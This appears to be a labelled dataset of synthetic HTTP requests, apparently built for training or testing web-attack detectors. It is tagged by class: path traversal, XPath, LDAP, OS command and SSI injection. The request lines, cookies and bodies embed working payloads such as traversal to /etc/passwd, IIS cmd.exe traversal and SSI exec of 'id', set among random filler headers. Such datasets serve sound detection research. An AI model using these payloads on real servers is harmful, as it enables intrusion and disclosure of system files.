Transfer-Encoding: identity
Upgrade: pksat/0.9, it6/4.7, Atv/0.3, zos/6.7, aoE/5.6
Warning: 925 www.tgat.css "onzuY" 
X-Forwarded-For: 246.149.155.68
X-Serial-Number: 9273829516846529
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49759
Start - Id: 46362
class: PathTransversal
GET /sWLAzv0J5NG9zbgr3/JfsEeK/a7RCRJc--4Go3H4Eby.G/reeelseaNbsea2e/js5Krgroup byX60AFS/yX9nINJ/rneSpoaa8h/ZxmJperlDda_x5_M/htnt7te/Wnthaao/DstdinJEhM/pg_n9GEaRX.jpeg?teEElv=gy2bteesnl7g3lmny&wtt9OrgtaOit=rmdaAdr7nosnhT&ttvhoeqfHgVt3ai=..%2F..%2F..%2F..%2Fvar%2Flog%2Faccess_log%2500.html&jm=documentidaMudconnectmochaky%28iedit&Elcte=cZ%40TiwWwXK&leuizos6w=UA6oaho7roa&a0=8&a7iis=aneoa4w&Phn=+%3BDdhhiuhttps%3Eb&xhjPHmaxp_DC9=86&zl5euu=+usr%3Dss%2Bhome0aadminPOwhere&0use7xv=76434&v9ohzscoir=19016638&WcEN2=8&mn7ntanie=+%5D HTTP/1.1
Host: www.siaj.biz
Connection: close
Accept: text/*, audio/*;q=0.4, audio/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: ns-gre
Cache-Control: moqinl='e'
Client-ip: 191.28.125.93
Cookie: g2=dwartbnaekls;7Sh64WF8rd=697577689
Cookie2: $Version="64"
Date: Wed, 31 Mar 10 13:15:49 CET
ETag: W/"O6CVj03f@WFfucmV6x"
Expect: aitsn
From: cewts@1fgr.fr
If-Modified-Since: Mon, 15 Oct 07 01:00:37 CET
If-Unmodified-Since: Wed, 06 Aug 08 11:44:01 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 24 Oct 09 20:27:07 GMT
Max-Forwards: 9
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: NTLM YWFHbUVzVWVJY2E0dmY0bHNybWVkbnJuUmJlMHNhamlobG8zdXM=
Authorization: Digest uri=http://www.avahdta.net/hyot/amng/gsrc/Rik9h/setooq.exe
Range: 405245-17797
Referer: /k3harpr/eq2lqeD.cgi
TE: trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: 6abg2din1wrezoI
UA-CPU: StrongARM
UA-Color: color32
UA-Pixels: 648x2225
Via: oDe/1.6 255.123.18.169, incNO/2.8 www.hshne.js
Transfer-Encoding: identity
Upgrade: tarad/0.1, sawaj/0.5, aeLes/2.3
Warning: 298 47.169.61.113 "pr6idci4mnm8" "Fri, 15 May 09 02:27:43 UTC"
X-Forwarded-For: 67.104.67.27
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46362
Start - Id: 48765
class: XPathInjection
GET /OSNWXbH0Qyh9r/snyPleesotronea/8onssa6nktwginadIb/niI@Qt7S/meusrofnseeetgDIl/dloetqniaihn/nfsct7eos/mJwKOOE2cR.cw/avMjkbw/ys9fosusef/ss0osearoQslafby5.swf?desy=dLcOH&fGprocessing-instructionc=sl%7E4&httd5ebn0ntbbd=67463++or++++BOElme%2Fbe%2FwiskEd%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D3%5D++or++54%3D HTTP/1.0
Host: www.ynaLdidn.fr:80
Connection: otlmki2u
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: h-i9, gms-bztifihf;q=0.8, iro-nabihd
Cache-Control: no-transform
Client-ip: 7.16.5.141
Cookie: zed=140547;TITexec=183;Z1opty6=oi4kMawhrynyi;iikBitt=eiE n;iqowowtseLsrd=3129419115
Cookie2: $Version="80"
Date: Sun, 09 Apr 06 15:08:24 CET
ETag: "JPkHbt63LZW@TgBTvjUE"
Expect: 100-continue
From: W56oeEtt@besin7bi.ch
If-Modified-Since: Sat, 14 Jan 06 17:15:41 CET
If-Unmodified-Since: Fri, 19 Mar 04 08:16:29 UTC
If-Match: *
If-None-Match: "Xw_SS_rfttntfSCuV"
If-Range: Mon, 23 Jun 08 24:48:18 UTC
Max-Forwards: 8
MIME-Version: 1.8
Pragma: ceet=ewcI
Proxy-Authorization: NTLM dnRyaGhlbHJpbHRndG1uYWh3aWVjZWVtdFNodHJlRHJ0dHNlbnJybnVhYW5oSHQ=
Authorization: axoitr as3ea=nxterty
Range: 11-
Referer: /n9dus/fasD/artea/hbcwrd/ertF29a.php
TE: deflate,gzip;q=0.8,trailers
Trailer: If-Match
User-Agent: Mozilla/4.8 (compatible; Konqueror/0.6; Win98; fpodzf; htcsLldi2s)
UA-CPU: MIPS
UA-Disp: 924,263,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 0640x829
Via: 3.9 www.edesotms.tiff:1, 3.4 201.178.12.215:8619, nntpp/4.8 www.ltTci.jpg
Transfer-Encoding: hjte
Upgrade: npelr/9.1, ir3/9.6, trmYd/3.9, egD/1.4, hafn8/5.0
Warning: 362 201.253.51.98 "cwsHUxseAmledEt" "Tue, 17 Oct 06 16:09:16 UTC"
X-Forwarded-For: 98.154.59.21
X-Serial-Number: 265535777881770929
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48765
Start - Id: 45244
class: PathTransversal
GET .////////////////////////? HTTP/1.0
Host: www.musgtp.be
Connection: zuisyaa
Accept: */*;q=0.0
Accept-Charset: *;q=0.6
Accept-Encoding: *
Accept-Language: o-y;q=0.5, ei0t8-9m;q=0.1
Cache-Control: min-fresh=78551
Client-ip: 172.49.251.232
Cookie: Tcoqa=Trsbkvseuu;krbruSehmanqdo=et6 ;eitx4D=gfedtrns;nERtxIr=eu81e@
Cookie2: $Version="453"
Date: Wed, 20 Oct 04 06:53:49 UTC
ETag: W/"TC1C.R6SZLoWaRYE"
Expect: nT6mf=6igw
From: nr1cs36r@ar1hsxlt.org
If-Modified-Since: Mon, 26 Apr 10 02:37:03 UTC
If-Unmodified-Since: Mon, 01 May 06 14:35:36 UTC
If-Match: *
If-None-Match: "ZeUMHVkrw.uVUbox3"
If-Range: Thu, 26 Feb 09 18:52:01 CET
Max-Forwards: 8
MIME-Version: 1.7
Pragma: 6o2iTn='e7h'
Proxy-Authorization: Digest qop=evai40
Authorization: sp25il SUuE=4iuouhb
Range: 220-5761,42620-
Referer: /dirns/lhiidu/hneuve7/sgso5iD/9Rte.gif
TE: chunked;q=0.3,trailers
Trailer: Expect
User-Agent: Keal2/0.4.1
UA-CPU: x86
UA-Disp: 568,3282,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 2272x045
Via: nneodo/9.9 www.8ar3eob.jpg:0444, wreTl/9.0 111.212.219.44:0, 7.6 212.203.15.0
Transfer-Encoding: compress
Upgrade: ttt5/9.0, laolhr/8.9, geei2/4.3
Warning: 831 www.rueghla.htm "ecA7eejeodtti" 
X-Forwarded-For: 42.110.150.96
X-Serial-Number: 67855229
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45244
Start - Id: 36645
class: OsCommanding
PUT /3YJhw7sQxe83K/hW/dlJKi44naRU5z2UJ/lHzlI5XA.0cdI/a1XVO4cNaCtga4yLadD/nA_hNjwW7a1s.i3Mxic.css? HTTP/1.0
Content-Length: 244
Content-Language: dr,haet,rj6
Content-Encoding: compress
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 26 Apr 05 08:18:07 CET
Host: 92.118.62.241:17
Connection: eeynhdrf
Accept: application/zip;q=0.3
Accept-Encoding: *;q=0.6
Date: Tue, 31 Aug 04 22:34:53 UTC
If-Match: *
If-None-Match: "tvJu4o@X7_TKt6U"
Referer: http://ftsdtke.org/66Ae/7ecbs0/aebii/se7yrh.pdf
User-Agent: cCQrQDTo http://www.ydrG.biz
UA-Pixels: 782x498
Transfer-Encoding: identity
X-Forwarded-For: 24.190.144.96

Ricprbseomb=11760797&dtnxhnineggz=|    dir  ..\\..\\..\\..\\..\\..\\..\\     ,&Acnenrw=sr| system&arkfensfrlk=Enu3dLnullrat&IioJ77eval1Nl=231&siolmtZohocus=o &QvgI=ma7O&nresl4=a@Y2telnetnoptsxmlwget&tle;U

End - Id: 36645
Start - Id: 38467
class: LdapInjection
GET /ztese/le.cfm?hjrrs_E=69390359&tttd9irRt=situOitthuSpSca&bvretmh1=551&9ctei=%29+++%28%7C%28+cn%3D*o+%27brien*%29%28mail+%3D*o++%27brien*+++%29++ HTTP/1.0
Host: www.soiueB.net
Connection: keep-alive
Accept: image/png;q=0.4, video/*;q=0.9
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: ej-3mRuit;q=0.4
Cache-Control: only-if-cached
Client-ip: 86.172.21.20
Cookie: hmhoeaznnwgso=5429;osAtggxhshee2t=onmjfarumxudo;Etqe=9;ifxt=re;my=19021;pbaeeeuwEeBotl=r7A6aAtzgGM
Cookie2: $Version="554"
Date: Sun, 11 Apr 04 23:13:23 CET
ETag: "dAKakF.oYxCdLRoI.Z"
Expect: betmtr=nyjiso;hCgrf6g
From: odvt@tmdyhis.org
If-Modified-Since: Wed, 25 May 05 11:08:22 CET
If-Unmodified-Since: Sun, 21 Sep 08 11:08:46 CET
If-Match: *
If-None-Match: "QxpqdLL7zpP411paH"
If-Range: Tue, 26 Sep 06 13:37:33 UTC
Max-Forwards: 736
MIME-Version: 6.7
Pragma: no-cache
Proxy-Authorization: iiEb vcnyig9=nalmt
Authorization: hoec no8en=Rmneert
Range: 24-,76759-,-19589
Referer: /nt0rto.pl
TE: gzip,trailers
Trailer: If-Match
User-Agent: Mozilla/4.5 (Machintosh; U; PPC Mac OS X 1.3; rc-rt; rv:5.7.4) Gecko/09701576
UA-CPU: 68000
UA-Disp: 3037,4035,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 632x125
Via: 5.0 www.eilhyt.js:22, 9.7 202.26.190.36
Transfer-Encoding: compress
Upgrade: Nlohim/6.2, ors/6.8, ine/9.2, aauq/0.7, cvl87u/8.4
Warning: 346 www.tt8o.css "ptUwt" "Mon, 17 Mar 08 22:41:42 GMT"
X-Forwarded-For: 96.44.37.3
X-Serial-Number: 8565701730547644653
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38467
Start - Id: 36244
class: PathTransversal
GET /Vkc/u3zUeiUlkZ4jRMfQW/6yI5Ne1oYWyLz/7nYkoLdre/LM/1bkUVfV6.php?gddhoh=92&V.Rl=8iqV&srBoNu4b=nj0+or&SEzwR=-6i+si&hzdqssa=rf1l&zncocmds6OOI=530&jseedsd7saawom=eca&VO7Q2t.N=T05t HTTP/1.1
Host: www.eoLp.org
Connection: close
Accept: image/jpeg
Accept-Charset: iso-8859-6;q=0.0, x-mac-korean, x-mac-ce;q=0.4
Accept-Encoding: gzip;q=0.6, compress
Accept-Language: *
Cache-Control: no-transform
Client-ip: 240.115.174.4
Cookie: llas3=w;2t1=0333;lwAE=\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/etc\/passwd%00.html
Date: Tue, 04 Jul 06 09:30:08 CET
ETag: "0el.w68uvz7cxtIZ@O@"
Expect: 100-continue
If-Modified-Since: Fri, 25 Jun 04 08:33:52 GMT
If-Unmodified-Since: Mon, 26 Sep 05 01:55:35 GMT
If-Match: *
If-Range: Sun, 25 Jun 06 18:46:02 CET
Max-Forwards: 1362
Referer: http://aEprr.com/rLoc/tFnEaeE/fsprzo/ltgboaN/BM55dt.cfm
User-Agent: Mozilla/4.5 (Machintosh; U; PPC Mac OS X 7.4; nb-tn; rv:9.9.5) Gecko/25658696
Via: trt/4.7 194.197.129.175:95, FTP/1.2 156.94.142.77, HTTP/5.4 8.231.188.65
Transfer-Encoding: identity
Upgrade: tt4t/4.6, tt6/4.9, bcuTc/8.8, ncaal/0.8, ldUz/6.6
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 36244
Start - Id: 49579
class: XPathInjection
GET /t7O1Ut0kxxvRxVts2-/ivZ3/ocPLttogahmLhhEre/3smitd/ybietUBtqeitnqaUo/dtB4sq/PfEL7Z_gmLy/iLW3XM91Vuj6FCcuIPr.css?tse2=mmesape%27++++or++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D++or++%27Dthw%27+%3D+++%27 HTTP/1.1
Host: 229.141.204.54:71232
Connection: close
Accept: video/*;q=0.1
Accept-Charset: euc-jp, x-mac-korean;q=0.7, gb2312;q=0.4, iso-10646-ucs-2
Accept-Encoding: 
Accept-Language: *
Cache-Control: ledhc1=dilht
Client-ip: 184.205.215.140
Cookie: 1afraiprntal=01695824;toTw0si=fat
Cookie2: $Version="6"
Date: Thu, 30 Dec 04 22:11:22 GMT
ETag: "xh1l6UnAdi-ZT-Z47-j"
Expect: rrqenrnd
From: xAlQbr@oetAt.gov
If-Modified-Since: Sat, 04 Oct 08 11:16:37 GMT
If-Unmodified-Since: Wed, 03 Aug 05 09:14:43 GMT
If-Match: "Ug3Z5HmEZSV3.ChgI9M"
If-None-Match: "MY46Vh.n75PPlpuB2F"
If-Range: Wed, 06 Jun 07 21:08:43 GMT
Max-Forwards: 2
MIME-Version: 5.6
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: 0ejre partissh=brdssh
Range: -191,56-,-47911
Referer: http://www.yEewrxt.biz/5orato/dd6k/abGm3n.msf
TE: chunked;q=0.7,gzip;q=0.4,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/1.8 (Machintosh; U; Mac OS X 9.9; e3-oG; rv:2.1.7) Gecko/93262355
UA-CPU: StrongARM
UA-Disp: 979,7479,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 2073x766
Via: 9.0 59.254.79.224:3497, 6.2 www.atewfme.shtml:443
Transfer-Encoding: gzip
Upgrade: w3tun/4.7, nll2c/3.7, iotwG/2.5, ialro/2.8, zf5q/7.2
Warning: 497 53.69.32.200 "2sutvHa56sEcoGpl" "Mon, 17 Oct 05 23:56:09 GMT"
X-Forwarded-For: 192.195.46.225
X-Serial-Number: 4750592519886658439
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49579
Start - Id: 36627
class: OsCommanding
GET /samples/..��..��..��..��..��../winnt/system32/cmd.exe?/c+ HTTP/1.1
Host: 166.35.4.232
Connection: iAlhZ
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: deflate, gzip;q=0.9, deflate, gzip;q=0.2, deflate;q=0.5
Accept-Language: *
Cache-Control: max-age=725
Client-ip: 107.48.3.140
Cookie: pn=57824;iseee1t=881;urriow=pu>k@6Thd;processing-instructionnCNzlinkHi=644027670;tet=g8DClC
Cookie2: $Version="2"
Date: Thu, 20 Mar 08 06:30:07 GMT
ETag: "zWK@khPcwyjwc74KjL"
Expect: 100-continue
From: safieadn@TokeCnm8Oe.org
If-Modified-Since: Tue, 27 Apr 10 16:28:36 GMT
If-Unmodified-Since: Wed, 28 Jul 04 19:39:57 GMT
If-Match: "5pgR@UAQxysEehx"
If-None-Match: *
If-Range: Thu, 05 Nov 09 09:20:03 UTC
Max-Forwards: 719
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: Digest qop=auth-int
Authorization: NTLM b1JldHRpYXNhaWloaGlhdnh0ZGpRZWhza3IwYW90MGlCeGM=
Range: 75537-,8-
Referer: http://www.2zs8d.de/seio7br0/Cphstgxa/qmbeiua/epnuibe3/Gaiyf.asp
TE: chunked;q=0.9,trailers,deflate
Trailer: TE
User-Agent: rAoU0X http://www.ypsml7u2.ch
UA-CPU: StrongARM
UA-Disp: 427,9941,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 477x077
Via: cetahi/2.2 102.63.138.220, 5.4 www.lTveiTt.gif, aOAE/2.1 www.Aiieouo.jpeg:5
Transfer-Encoding: compress
Upgrade: aDote/0.4, nnlrf/4.3, ecsEa/7.5
Warning: 933 www.oecji.html "M3c95ra8" "Thu, 10 Dec 09 13:28:45 UTC"
X-Forwarded-For: 68.142.150.165
X-Serial-Number: 24160337067765
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36627
Start - Id: 40712
class: SSI
PUT /aJ-T09w/u9mpositionCIArJ42F/iU/94m85K.a2I4rR6L_nJva/s1ocIsebtbn.shtml? HTTP/1.0
Content-Length: 205
Content-Language: rd
Content-Encoding: compress
Content-Location: http://jtrAnnCe.gov/X7su/cStaooe/weef.tiff
Content-MD5: TmxiZWVvSTdpb2FvOGhodw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 15 Jun 06 02:12:54 CET
Last-Modified: Thu, 04 May 06 14:14:10 UTC
Host: 37.125.233.64
Connection: ruwy
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: s-vra, bNntaoyc-esyM0, n3aeI-ux, m-iE;q=0.8, iei-I;q=0.2
Cache-Control: only-if-cached
Client-ip: 110.73.204.149
Cookie: rtl=<!--     #include  virtual="c:\winnt\system.ini"   -->
Cookie2: $Version="0"
Date: Mon, 18 Apr 05 16:39:46 CET
ETag: W/"AsYfFIn@BXWCJcvpR4lf"
Expect: etqfdncl=ihi5of;sDsnmeCd
If-Modified-Since: Fri, 31 Dec 04 11:14:37 UTC
If-Unmodified-Since: Tue, 02 Jan 07 08:52:30 GMT
If-Match: *
If-None-Match: *
If-Range: "USPM6KyzNyIyRxs@sQ"
Max-Forwards: 7
Pragma: Ni='mutmrr'
Authorization: NTLM aU9zd2RpdG5vbnNtUGg3Zm9lZWh0aXVhdHljOGFoc29hMmFMdDBpY3RiZWU=
Referer: http://www.nr3amrbm.cz/8ooh/yrnHaos/dilne.msf
TE: gzip,deflate;q=0.3,trailers
User-Agent: bcfoFatu/4.1.0.5.9
UA-CPU: x86
UA-Disp: 1082,158,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 563x6665
Via: FTP/7.2 www.Tunso6i2.html, HTTP/0.8 www.sminie.js:55
Transfer-Encoding: ueep
Upgrade: tentcb/2.8, maw/3.0
Warning: 992 www.btohet.jpg "gesleaaifbflgHiirn" 
X-Forwarded-For: 177.66.165.150

hRe=hmnbxclhiyto21&yhihEauoiitt=pMcnoi&laar8snp4aaw=38151635&hcct=r&Mclwindow.open-X=h5wget@dnzqts&tbarllnthRTkule=ahtpassq &ucrug7eaorp=4&forvir=69738&odtnnLkuutyhott=fxk2WM07&te9entSat=e&Atwtjetp=h4foh

End - Id: 40712
Start - Id: 39269
class: SSI
GET /ntZU3_rZcHlPPzH/co7mld4en/_YzdnvchildQEZ/3zAreplace.0ao.Ptelneteav4/autoexec34azncmHshutdownudXvZ/soejd/tOgAOtTXxEE4vhN/dTQv0ppNpPqpTTdRJ/rrcpicr/m@YoEj0To-E2cAc/XbinZim0vfeKjs/0la.php?k5oyhotftje=71&slajlob9wmedne=le3GtEe&nC=00&ee=os%26ohe&DNNl1shutdowntelnet7l=%3C%21--%23echo+var%3D%22date_gmt%22--%3E&7tlhDtyhtsnDnnl=%3Ct+w&ncLkot=70788&9P0C=tyTzi&winntWchildZ8FOy=46&etouea2sUe=rpdtCN&yZrYNEIzoTF=e14HtPES&autealis=mLG&qu.xqOhKMq=mDY&oepaslersaes=thavingou%28nd%28%2FnLt&9f3nncsdg=nd HTTP/1.0
Host: www.ma5dwy.cz
Connection: close
Accept: video/*;q=0.7
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ezayua-0s3oitrn, asnwhn-pha5ubea;q=0.7, emauhrto-abd8en5U, p58no-ineeSen8;q=0.9, sices-nd3solr
Cache-Control: no-store
Client-ip: 128.247.28.202
Cookie: dntyRiqeeolrl=aw_;rdqevr4tanibyh=9377;des5tchot=03429728;eheoe2if=)tr8oeid2rt4;Af
Cookie2: $Version="1"
Date: Sat, 25 Mar 06 16:32:48 CET
ETag: W/"9-rc_VTbp3Y9zuJ3"
Expect: aaf8=sGn0Eoi;tn7siqso=h1poj
From: erhT@noAtt.uk
If-Modified-Since: Wed, 04 Aug 04 21:58:11 GMT
If-Unmodified-Since: Sat, 31 Mar 07 17:41:22 CET
If-Match: *
If-None-Match: "RwjmJJj2ALUSTD7yxPQz"
If-Range: "yN36kgKImrjW6fC7"
Max-Forwards: 7
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: NTLM dGs2bnNEZXBhN2h0dG5ldlFCbnlkQXN0c25tcmFrb1B0YXVzbXlJbm9paFBsaTE=
Authorization: lwtaEj 30vns2i=tbjhtpo
Range: 103-767,422854-
Referer: http://erir.cz/gsOqNe.jpeg
TE: trailers,trailers
Trailer: Expect
User-Agent: Mozilla/4.9 (compatible; teJreDsnv1; Linux i586; htpthgopn)
UA-CPU: MIPS
UA-Disp: 3603,824,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 8684x662
Via: 2.4 www.Yoialds.gif, 5sejix/1.3 120.205.5.91
Transfer-Encoding: compress
Upgrade: etsi/0.2, 42Nn/6.7
Warning: 014 58.200.111.202 "ltrIo" 
X-Forwarded-For: 237.101.171.41
X-Serial-Number: 04901
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39269
Start - Id: 39208
class: SSI
PUT /vyAel6HVva4nYKid8otu/6cG5oTq1/aqenRr/xp_tNG_UR_.htm? HTTP/1.1
Content-Length: 169
Content-Language: 89iV
Content-Encoding: compress
Content-Location: /aDsfi/hcsiasm1.doc
Content-MD5: bmlkbGFkaGRubjRlbmVFbg==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 15 Jan 09 20:22:39 CET
Last-Modified: Sun, 31 Dec 06 07:04:36 CET
Host: 19.192.149.90
Connection: keep-alive
Accept: */*
Accept-Charset: iso-2022-jp, cp-932, x-mac-cyrillic;q=0.9
Accept-Encoding: compress, gzip;q=0.2, identity
Accept-Language: bC7cug-eplntrnr, e4nldhv-e;q=0.5, e-ute60c5, r8Epdyo-mtln;q=0.0, ri-tmmor0la
Cache-Control: max-age=448
Client-ip: 185.235.27.5
Cookie: RTR@wnlp=39507048
Cookie2: $Version="690"
Date: Thu, 04 Oct 07 16:58:21 GMT
ETag: W/"tkG_MPg8BOWUxnTI"
Expect: 100-continue
From: egngmnl@let9lo.net
If-Modified-Since: Sat, 05 Nov 05 01:52:11 UTC
If-Unmodified-Since: Tue, 01 Nov 05 05:45:05 GMT
If-Match: "HnWcZevZ@a7miGe0K"
If-None-Match: *
If-Range: Fri, 17 Oct 08 11:20:12 CET
Max-Forwards: 2
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: dlel tipu=gsey
Authorization: sooi1s zastsf=tBmrs
Range: -6444
Referer: /5edkr2m/dnaizA/oo9chD.sh
TE: trailers,trailers,gzip
Trailer: Proxy-Authorization
User-Agent: Mozilla/2.4 (Machintosh; U; PPC Mac OS X 5.9; jn-po; rv:7.4.0) Gecko/58948305
UA-Disp: 375,7789,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 486x328
Via: 3.0 www.ueiNo.tiff
Transfer-Encoding: compress
Upgrade: mwT/9.9, pqe7ei/0.1, ilshda/6.7, sDi/9.1, esice/0.8
Warning: 080 161.106.107.38 "ptynoda1w" "Wed, 05 Oct 05 18:34:52 GMT"
X-Forwarded-For: 10.24.21.76
X-Serial-Number: 4765226560917916
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

nn4=450585&aeA=avz-j@YDf0&iLdtstgsTEvs=o.n&Uheddooile2ao=eyei&hneLhoeW2ssxdL=9irAth0wh&eh5olqetereo=<!--     #exec  cgi="/cgi-bin/script?onsBe" -->

End - Id: 39208
Start - Id: 44327
class: OsCommanding
GET /scripts/..�../..�../mssql7/install/pubtext.bat" & dir c:\ .exe? HTTP/1.0
Host: www.leuel.de
Connection: close
Accept: video/quicktime;q=0.6, text/xml;q=0.6
Accept-Charset: iso-10646-ucs-2;q=0.5, x-mac-chinesetrad
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: no-transform
Client-ip: 202.227.254.173
Cookie: pexk=zO-HOG91k;fAEmf5olleo=pterftnf1IIwye;LVSfj70KRNZ=68530883;hIloaaggrunqm=1iWvsy;gmualoe5t=xmletei
Cookie2: $Version="72"
Date: Thu, 02 Oct 08 14:45:23 CET
ETag: "JwOlqko42x3NtlOT"
Expect: Isdeea8T=dvor7
From: ssaaei@srTei5is.de
If-Modified-Since: Thu, 15 Jan 04 15:41:58 UTC
If-Unmodified-Since: Mon, 28 Aug 06 01:36:39 UTC
If-Match: "Ys3-t@Nfjjqzz8p"
If-None-Match: *
If-Range: "KifzXthQy8DwbK-h6d"
Max-Forwards: 0173
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: Basic T2hsMGg6YWFhMg==
Authorization: Digest qop=o9hhYhvt
Range: 88-15414
Referer: /Sisa/qeTt7/T0rrhhd/ibTehm/f4nEqe.wmn
TE: deflate;q=0.5
Trailer: If-None-Match
User-Agent: 3ll4isht3Akqmd
UA-CPU: PowerPC
UA-Disp: 9070,4804,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 127x111
Via: 4.0 www.ttekp.shtml, FTP/3.1 224.85.199.129
Transfer-Encoding: compress
Upgrade: tzsa/1.2, i18be/3.4, iXa/9.5
Warning: 477 www.oeiseg.css:177 "oNngqeeniilu" 
X-Forwarded-For: 81.125.200.90
X-Serial-Number: 4707675607021024979
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44327
Start - Id: 40583
class: SSI
GET /r2f6fi6Zg/o6av8Yv/bt.htm?sanhooererhtlil=i%3Dm%2B8atAry&Szu=viibnnneouqiTEI1&f8mdags=itrlikeacon7&oinat4erth=9&G8ypotfntoo=77159661&wneaeNs=dx+e2+e+m+e8zn%7Eqi%5D&iihadiast=%3C%21--++++%23include++virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22++++--%3E HTTP/1.0
Host: www.rhn4eb6i.de
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: windows-1255, iso-2022-kr;q=0.9, iso-2022-jp;q=0.9, iso-2022-kr;q=0.5
Accept-Encoding: deflate, identity;q=0.0, compress;q=0.4, identity
Accept-Language: *
Cache-Control: lwkd=lIhh
Client-ip: 58.12.242.231
Cookie: thnrhoEdmnp=ep9;waAd3M=dyEt;CoieB6 5ht/as;mL0bcVKpC=0586465;nnCidon=3;ysrptr=aytT;IcitgNnd8aw=11
Cookie2: $Version="87"
Date: Thu, 03 Dec 09 18:04:43 GMT
ETag: "x@sHNb3bcQ7K0CmHb"
Expect: 100-continue
From: ws8c3i@tat8.st
If-Modified-Since: Sat, 05 May 07 06:26:04 GMT
If-Unmodified-Since: Thu, 27 Dec 07 24:20:00 UTC
If-Match: *
If-None-Match: "10NMIYLopGb8ZYm4"
If-Range: "mVihWDZ524JyX-M-h0Rw"
Max-Forwards: 73
MIME-Version: 9.9
Pragma: t=pn8
Proxy-Authorization: NTLM eXNIb3R0ZWE5enRuYWlucm5JNWFldGxFYTNxYXJtNm9ubm90
Authorization: Digest opaque="nnien"
Range: 437-
Referer: http://ocrjsa.uk/rllkh/hss6noce.nsf
TE: trailers,trailers,deflate
Trailer: If-None-Match
User-Agent: Orhje1
UA-CPU: StrongARM
UA-Disp: 563,477,16
UA-OS: Windows 98
UA-Pixels: 8517x087
Via: 9.0 www.3icjsxzE.gif, FTP/1.3 119.164.207.243, HTTP/6.8 www.an4waN.jpeg
Transfer-Encoding: gzip
Upgrade: nmoNa/7.1, shl/2.8, suah/2.9, drnip/9.7, aunle/8.8
Warning: 835 www.trhpd.htm "psE9Ldemvcians32" "Sun, 26 Nov 06 20:41:29 UTC"
X-Forwarded-For: 169.156.207.121
X-Serial-Number: 69115
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 40583
Start - Id: 39994
class: SSI
GET /bpecde1t0il37hnBen/onJgihnb/RcsI9/bedo1meeb9qeiRd/wBJyYdsXrweZFjOG_w/OT/r1B8jgn3uOyOR0FY@O/WPuIWux9YRVt.html?esio=%3C%21+%23%3C%21--+%23exec++++cmd%3D%22id%22--%3E&inec5ot=dgl&sheenen=85727&sp_s=ue3shalreiesti&a7iEtvrntyilr60=s6jvU-HO2&F3nX=j2tsNl&reh=457075813 HTTP/1.0
Host: 198.36.206.176
Connection: keep-alive
Accept: image/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=644
Client-ip: 253.235.28.77
Cookie: docsurmmgo6a=seWA1MpM2A;aqceitnnta=waey
Cookie2: $Version="26"
Date: Fri, 08 Apr 05 02:59:25 UTC
ETag: W/"snzYcROZfCdT0_HXP"
Expect: 100-continue
From: atetgwlh@rphs.com
If-Modified-Since: Thu, 21 Jul 05 06:20:02 CET
If-Unmodified-Since: Thu, 08 Apr 10 22:18:27 UTC
If-Match: "5ATC9_blYrj3waAP5o0"
If-None-Match: *
If-Range: *
Max-Forwards: 4446
MIME-Version: 5.0
Pragma: no-cache
Proxy-Authorization: NTLM eGVoYU44dHJtYXJUODcyZWV6b25idTRpN3RpMmMzcmlEYnY0MW5qcmFjQQ==
Authorization: Digest response="5dc4135A5DF33d19fFc37CdbA06B50E0"
Range: 618-573,4-,461-
Referer: http://www.d9ogo.biz/GYetat/aempeut/KeRmhei/eehrvj.php
TE: trailers
Trailer: TE
